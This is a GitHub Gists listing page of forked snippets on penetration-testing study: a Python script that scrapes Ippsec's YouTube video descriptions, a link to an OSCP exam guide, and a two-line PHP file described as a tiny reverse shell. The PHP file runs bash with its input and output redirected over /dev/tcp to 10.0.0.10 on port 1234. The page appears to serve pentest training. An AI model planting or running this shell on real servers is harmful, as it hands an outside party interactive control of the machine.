Skip to content

Instantly share code, notes, and snippets.

@purpleatm
purpleatm / get_ippsec_details.py
Created July 3, 2019 04:34 — forked from sminez/get_ippsec_details.py
Find examples of pen testing methods and tools in videos by Ippsec (as of 26th June 2019)
#!/usr/bin/env python3
"""
Script used to pull down the current video descriptions from ippsec's youtube channel.
The raw output still has a few HTML tags that need to be manually removed and there
also seem to be multiple duplicates of videos that have been removed in the output
saved as ippsec-details.txt
"""
import re
import sys
@purpleatm
purpleatm / shell.php
Created June 14, 2019 02:59 — forked from rshipp/shell.php
A tiny PHP/bash reverse shell.
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'");
@purpleatm
purpleatm / how-to-oscp-final.md
Created June 13, 2019 18:59 — forked from meldridge/how-to-oscp-final.md
How to pass the OSCP